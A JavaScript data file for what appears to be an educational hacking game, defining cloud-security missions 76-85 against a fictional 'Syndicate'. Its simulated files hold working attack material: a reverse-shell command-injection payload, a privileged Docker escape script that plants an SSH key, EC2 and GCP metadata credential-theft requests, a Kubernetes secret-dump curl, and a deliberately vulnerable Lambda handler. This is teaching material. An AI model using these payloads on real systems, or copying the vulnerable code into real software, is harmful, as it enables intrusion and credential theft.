// Chapter 8: Cloud Security (Missions 76-85)
const mk=(id,n,l,t,c,b,o,i,co,fs,p,h,pk,sc,tr,ex={})=>({id,name:n,level:l,estimatedTime:t,unlockedCommands:c,briefing:`[CLOUD ENG]\n\n${b}\n\n— Cloud Arch`,objective:o,story:{intro:i,completion:co},filesystem:fs,initialPath:p,hints:h,progressKeys:pk,successCondition:sc,triggers:tr,...ex});

export const mission76=mk('mission76','Open S3 Bucket',76,6,['ls','cd','cat','grep','help','clear','pwd','hint','status'],"The Syndicate uses AWS for backups. Find their unsecured storage bucket.","Find the leaked AWS S3 bucket and retrieve its contents","Cloud storage misconfiguration.",
  "You located the unsecured 'syndicate-backup-data' S3 bucket and downloaded the client list.",
  {'cloud':{'bucket_url.txt':`STORAGE BUCKET FOUND:\n\nURL: https://s3.amazonaws.com/syndicate-backup-data/\nAccess: PUBLIC READ\n\nContents downloaded to local directory.`,'s3_dump':{'client_list.csv':`CLIENT,PAYMENT_CRYPTO,STATUS\nOmega_Corp,15BTC,CLEARED\nShadow_Broker,42XMR,PENDING\nAlpha_Zero,100BTC,CLEARED`,'database_backup.sql':`-- Syndicate Main Database Backup\n-- Tables: users, secrets, targets\n\nINSERT INTO targets VALUES (1, 'GovNet_Main', 'HIGH');`}}},'/cloud',["Check the bucket url first.","Inside the s3_dump folder, check the CSV file."],['readUrl','readCSV'],(p)=>p.readUrl&&p.readCSV,[{command:'cat',args:['bucket_url.txt'],progressUpdate:{readUrl:true},narrative:'🌐 Found a public S3 bucket! Anyone can read this data.'},{command:'cat',args:['s3_dump/client_list.csv'],progressUpdate:{readCSV:true},narrative:'📄 Client list leaked! S3 misconfigurations are the #1 cause of cloud breaches.'}]);

export const mission77=mk('mission77','IAM Privilege Escalation',77,8,['ls','cd','cat','grep','help','clear','pwd','hint','status'],"We have low-level AWS IAM keys. See if you can escalate your privileges to Admin.","Analyze IAM policies to find a privilege escalation path","IAM policy analysis.",
  "Escalated to AdministratorAccess by exploiting the iam:PutUserPolicy permission.",
  {'iam':{'keys.txt':`AWS ACCESS KEYS:\n\nAccess Key: AKIAIOSFODNN7EXAMPLE\nSecret Key: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n\nUser: 'dev_intern'`,'policy.txt':`IAM POLICY ATTACHED TO 'dev_intern':\n\n{\n  "Version": "2012-10-17",\n  "Statement": [\n    {\n      "Effect": "Allow",\n      "Action": [\n        "s3:List*",\n        "iam:PutUserPolicy"\n      ],\n      "Resource": "*"\n    }\n  ]\n}`,'escalate.txt':`ESCALATION PATH:\n\nBecause the user has 'iam:PutUserPolicy', they can attach ANY policy to themselves!\nWe can add AdministratorAccess!\n\nPayload executed... Success! 'dev_intern' is now an Admin.`}},'/iam',["Check the attached IAM policy.","Notice the dangerous 'iam:PutUserPolicy' action.","Read the escalate text to execute."],['readPolicy','escalated'],(p)=>p.readPolicy&&p.escalated,[{command:'cat',args:['policy.txt'],progressUpdate:{readPolicy:true},narrative:'🔑 The user has permission to change their own permissions! A classic IAM flaw.'},{command:'cat',args:['escalate.txt'],progressUpdate:{escalated:true},narrative:'🚀 Privilege escalated! We now have full AdministratorAccess to their AWS account.'}]);

export const mission78=mk('mission78','Serverless Abuse',78,7,['ls','cd','cat','grep','analyze','help','clear','pwd','hint','status'],"A serverless AWS Lambda function is processing images. Inject a payload to get RCE.","Exploit a command injection flaw in an AWS Lambda function","Serverless function exploitation.",
  "Command injection in Lambda function spawned a reverse shell from the serverless container.",
  {'serverless':{'lambda_code.py':`import os\n\ndef lambda_handler(event, context):\n    # The function converts uploaded images using ImageMagick\n    filename = event['filename']\n    \n    # VULNERABILITY: Unsanitized input passed directly to os.system\n    os.system(f"convert /tmp/images/{filename} -resize 100x100 /tmp/thumb.png")\n    \n    return "Success"`,'payload.txt':`EXPLOIT PAYLOAD:\n\nWe pass the filename as:\n  "image.jpg; bash -i >& /dev/tcp/10.0.0.5/9001 0>&1"\n\nThis breaks out of the 'convert' command and spawns a reverse shell\ndirectly from the AWS Lambda microVM!`}},'/serverless',["The python code uses os.system() unsafely.","Check the payload.txt to see the injection."],['readCode','readPayload'],(p)=>p.readCode&&p.readPayload,[{command:'cat',args:['lambda_code.py'],progressUpdate:{readCode:true},narrative:'☁️ Found OS command injection in the serverless python code.'},{command:'cat',args:['payload.txt'],progressUpdate:{readPayload:true},narrative:'🐚 Reverse shell spawned from AWS Lambda! We are inside their cloud environment.'}]);

export const mission79=mk('mission79','Metadata SSRF',79,8,['ls','cd','cat','grep','help','clear','pwd','hint','status'],"The EC2 instance running their web app has an SSRF vulnerability. Steal the instance role credentials.","Steal AWS credentials via the IMDS metadata service","EC2 Instance Metadata SSRF.",
  "Stole temporary STS credentials from the EC2 Instance Metadata Service (IMDSv1).",
  {'ssrf':{'vulnerability.txt':`SSRF VULNERABILITY FOUND:\n\nThe web app has a feature to fetch external images.\nURL: http://syndicate-app.com/fetch?url=http://example.com/image.jpg\n\nThere is NO validation on the URL. We can make the server request its own internal endpoints.`,'metadata_request.txt':`IMDSv1 EXPLOTATION:\n\nWe send request to AWS Instance Metadata Service:\nhttp://syndicate-app.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/web-server-role\n\nResponse:\n{\n  "AccessKeyId": "ASIA...STOLEN",\n  "SecretAccessKey": "...",\n  "Token": "IQoJb3JpZ2lu..."\n}`}},'/ssrf',["Read the vulnerability to understand the SSRF.","Request the metadata IP (169.254.169.254)."],['readVuln','stoleCreds'],(p)=>p.readVuln&&p.stoleCreds,[{command:'cat',args:['vulnerability.txt'],progressUpdate:{readVuln:true},narrative:'🌐 SSRF found! The internal server can be forced to make requests for us.'},{command:'cat',args:['metadata_request.txt'],progressUpdate:{stoleCreds:true},narrative:'🔑 Metadata service hit! IMDSv1 returned temporary STS keys for the web-server-role!'}]);

export const mission80=mk('mission80','Container Escape',80,9,['ls','cd','cat','grep','analyze','help','clear','pwd','hint','status'],"We have a shell inside a Docker container. Escape the container to reach the host node.","Escape the privileged Docker container to reach the host node","Docker container escape.",
  "Escaped privileged container by mounting host device /dev/sda1.",
  {'docker':{'container_info.txt':`CONTAINER ENVIRONMENT:\n\nOrchestrator: Kubernetes (EKS)\nPrivileged Mode: TRUE ⚠️\nCapabilities: CAP_SYS_ADMIN\n\nBecause this container is running in 'privileged' mode,\nit has raw access to the host's devices.`,'escape.sh':`#!/bin/bash\n# DOCKER ESCAPE SCRIPT\n\n# 1. Mount the host's main hard drive into our container\nmkdir /mnt/host_root\nmount /dev/sda1 /mnt/host_root\n\n# 2. Add our SSH key to the host's root authorized_keys\necho "ssh-rsa AAAAB3Nza..." >> /mnt/host_root/root/.ssh/authorized_keys\n\n# 3. Chroot into the host\nchroot /mnt/host_root bash`}},'/docker',["Check container info. Privileged mode is a huge risk.","Check the escape script to see how the host is compromised."],['readInfo','escapedContainer'],(p)=>p.readInfo&&p.escapedContainer,[{command:'cat',args:['container_info.txt'],progressUpdate:{readInfo:true},narrative:'🐳 Container is running as PRIVILEGED! This breaks the isolation sandbox.'},{command:'cat',args:['escape.sh'],progressUpdate:{escapedContainer:true},narrative:'🔓 Mounted the host filesystem and chrooted. We escaped Docker and own the host node!'}]);

export const mission81=mk('mission81','Kubernetes RBAC',81,8,['ls','cd','cat','grep','help','clear','pwd','hint','status'],"We compromised a pod. Leverage weak K8s Role-Based Access Control to take over the cluster.","Exploit weak RBAC in Kubernetes to access secrets","Kubernetes RBAC exploitation.",
  "Exploited excessive RBAC permissions to read Kubernetes Secrets across all namespaces.",
  {'k8s':{'service_account.txt':`SERVICE ACCOUNT TOKEN:\n\nLocated at: /var/run/secrets/kubernetes.io/serviceaccount/token\n\nWe decoded the JWT token. The service account is named 'monitor-bot'.`,'rbac_config.yml':`ROLE BINDING FOR 'monitor-bot':\n\napiVersion: rbac.authorization.k8s.io/v1\nkind: ClusterRole\nmetadata:\n  name: monitor-role\nrules:\n- apiGroups: [""]\n  resources: ["pods", "secrets"]\n  verbs: ["get", "list"]\n\n⚠️ VULNERABILITY: The monitor-bot can read ALL secrets in the cluster!`,'dump_secrets.txt':`COMMAND:\ncurl -s https://kubernetes.default --header "Authorization: Bearer $TOKEN" /api/v1/secrets\n\nRESULT:\nExtracted all database passwords, API keys, and TLS certificates for the entire cluster.`}},'/k8s',["Read the service account token text.","Check the RBAC config to see what the token can do.","Dump the secrets."],['readRBAC','dumpedSecrets'],(p)=>p.readRBAC&&p.dumpedSecrets,[{command:'cat',args:['rbac_config.yml'],progressUpdate:{readRBAC:true},narrative:'☸️ RBAC misconfiguration! The monitoring bot was given permission to read Secrets.'},{command:'cat',args:['dump_secrets.txt'],progressUpdate:{dumpedSecrets:true},narrative:'🗝️ Master K8s secrets dumped! The entire cluster is compromised.'}]);

export const mission82=mk('mission82','Azure Logic Apps',82,8,['ls','cd','cat','grep','help','clear','pwd','hint','status'],"The Syndicate uses Azure Logic Apps for automation. Find the hardcoded SAS tokens.","Extract SAS tokens from Azure Logic App run history","Azure Cloud Automation.",
  "Found hardcoded Shared Access Signature (SAS) tokens in cleartext Logic App run history.",
  {'azure':{'logic_app_runs.txt':`LOGIC APP RUN HISTORY:\n\nRunID: 08585...931\nStatus: Succeeded\n\nAction: 'CopyBlobToStorage'\nInputs:\n  source_url: "https://syndicate.blob.core.windows.net/data"\n  sas_token: "?sv=2020-08-04&ss=b&srt=sco&sp=rwdlac&se=2030-01-01&st=2024-01-01&spr=https&sig=SUPER_SECRET_KEY" ⚠️\n\nOutput: 200 OK`,'sas_analysis.txt':`SAS TOKEN ANALYSIS:\n\nThe SAS token gives FULL (rwdlac) access to the Azure Storage Blob.\nLogic Apps store all inputs and outputs in cleartext in the Run History!\nAnyone with read access to the app logs can steal the token.`}},'/azure',["Check logic app runs for leaked keys.","Analyze the SAS token."],['readRuns','readAnalysis'],(p)=>p.readRuns&&p.readAnalysis,[{command:'cat',args:['logic_app_runs.txt'],progressUpdate:{readRuns:true},narrative:'☁️ Azure Logic App history logs cleartext inputs! Found a SAS token.'},{command:'cat',args:['sas_analysis.txt'],progressUpdate:{readAnalysis:true},narrative:'🔐 SAS token extracted. It grants full read/write/delete access to their Azure Storage.'}]);

export const mission83=mk('mission83','GCP Storage Pivot',83,9,['ls','cd','cat','grep','help','clear','pwd','hint','status'],"Move from a compromised Google Cloud Run instance into their Cloud SQL database.","Pivot from GCP Cloud Run to Cloud SQL Database","Google Cloud lateral movement.",
  "Impersonated the Compute service account to generate OAuth tokens and access Cloud SQL.",
  {'gcp':{'cloud_run.txt':`CLOUD RUN ENVIRONMENT:\n\nService: analytics-engine\nService Account: compute@developer.gserviceaccount.com\n\nWe queried the metadata server:\ncurl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google"`,'oauth_token.txt':`OAUTH TOKEN GENERATED:\n\nAccess_token: ya29.c.b0AXv0zT...\nExpires: 3599\n\nScope: https://www.googleapis.com/auth/cloud-platform\n\nThis token allows us to call any GCP API that the service account has access to.`,'db_access.txt':`CLOUD SQL CONNECTION:\n\nUsing the OAuth token, we authenticated via the GCP API to the Cloud SQL Auth Proxy.\n\nConnected to PostgreSQL instance 'syndicate-master-db'.\nDumped the ledger.`}},'/gcp',["Read cloud run text to see the default service account.","Read oauth token out.","Read db access to log into the database."],['readCloudRun','readDB'],(p)=>p.readCloudRun&&p.readDB,[{command:'cat',args:['cloud_run.txt'],progressUpdate:{readCloudRun:true},narrative:'☁️ Default GCP compute service account is attached. Asking metadata server for a token...'},{command:'cat',args:['db_access.txt'],progressUpdate:{readDB:true},narrative:'🏦 Tokens generated via Metadata Flavor! Authenticated to Cloud SQL and dumped the ledger!'}]);

export const mission84=mk('mission84','Terraform State Secrets',84,8,['ls','cd','cat','grep','help','clear','pwd','hint','status'],"The Syndicate deployed their infrastructure as code. Check their Terraform state file.","Find plaintext passwords in Terraform state files","Infrastructure as Code misconfiguration.",
  "Extracted AWS RDS master database passwords from plaintext Terraform state file.",
  {'terraform':{'main.tf':`TERRAFORM CONFIG:\n\nprovider "aws" {\n  region = "us-east-1"\n}\n\nresource "aws_db_instance" "default" {\n  engine         = "mysql"\n  instance_class = "db.t3.micro"\n  username       = "admin"\n  password       = var.db_password\n}`,'terraform.tfstate':`TERRAFORM STATE FILE:\n\n{\n  "version": 4,\n  "resources": [\n    {\n      "mode": "managed",\n      "type": "aws_db_instance",\n      "instances": [\n        {\n          "attributes": {\n            "username": "admin",\n            "password": "Syndicat3_Super_Secret_DB_Password_99!",\n            "endpoint": "mydb.czx...amazonaws.com"\n          }\n        }\n      ]\n    }\n  ]\n}\n\n⚠️ Terraform stores state in PLAINTEXT, even if the variable was a secret!`}},'/terraform',["Look at main.tf to see they use variables.","Look at the tfstate file. State files are a massive risk."],['readTF','readState'],(p)=>p.readTF&&p.readState,[{command:'cat',args:['main.tf'],progressUpdate:{readTF:true},narrative:'🏗️ They use Infrastructure as Code. The config looks secure...'},{command:'cat',args:['terraform.tfstate'],progressUpdate:{readState:true},narrative:'🤦‍♂️ Terraform stores the final state in PLAINTEXT! Found the RDS master database password!'}]);

export const mission85=mk('mission85','Cloud Audit',85,7,['ls','cd','cat','grep','help','clear','pwd','hint','status'],"Review all cloud vulnerabilities discovered to prepare for the final chapters.","Review the synthesized Cloud Security audit report","Cloud chapter overview.",
  "Cloud audit submitted. Issues summarize IAM, SSRF, serverless, and Kubernetes vulnerabilities.",
  {'audit':{'cloud_summary.txt':`CLOUD SECURITY AUDIT:\n\nMajor Findings:\n1. Publicly readable S3 buckets\n2. Over-permissive IAM roles (iam:PutUserPolicy)\n3. RCE via Serverless command injection\n4. Cloud Metadata SSRF (IMDSv1)\n5. Privileged Containers & K8s RBAC flaws\n6. Plaintext secrets in Terraform State\n\nThe cloud is just someone else's computer. It requires strict identity management.`,'next_steps.txt':`NEXT STEPS:\n\nWe have conquered the Cloud layer.\nOnly one obstacle remains before the Boss: the physical IoT hardware layer.\n\nProceed to Chapter 9.`}},'/audit',["Read the summary text.","Read the next steps."],['readSummary','readNextSteps'],(p)=>p.readSummary&&p.readNextSteps,[{command:'cat',args:['cloud_summary.txt'],progressUpdate:{readSummary:true},narrative:'☁️ Cloud audit complete. Their infrastructure collapses under bad IAM defaults.'},{command:'cat',args:['next_steps.txt'],progressUpdate:{readNextSteps:true},narrative:'✅ Cloud chapter done. Hardware and IoT layer is next.'}]);

export const chapter8Missions=[mission76,mission77,mission78,mission79,mission80,mission81,mission82,mission83,mission84,mission85];
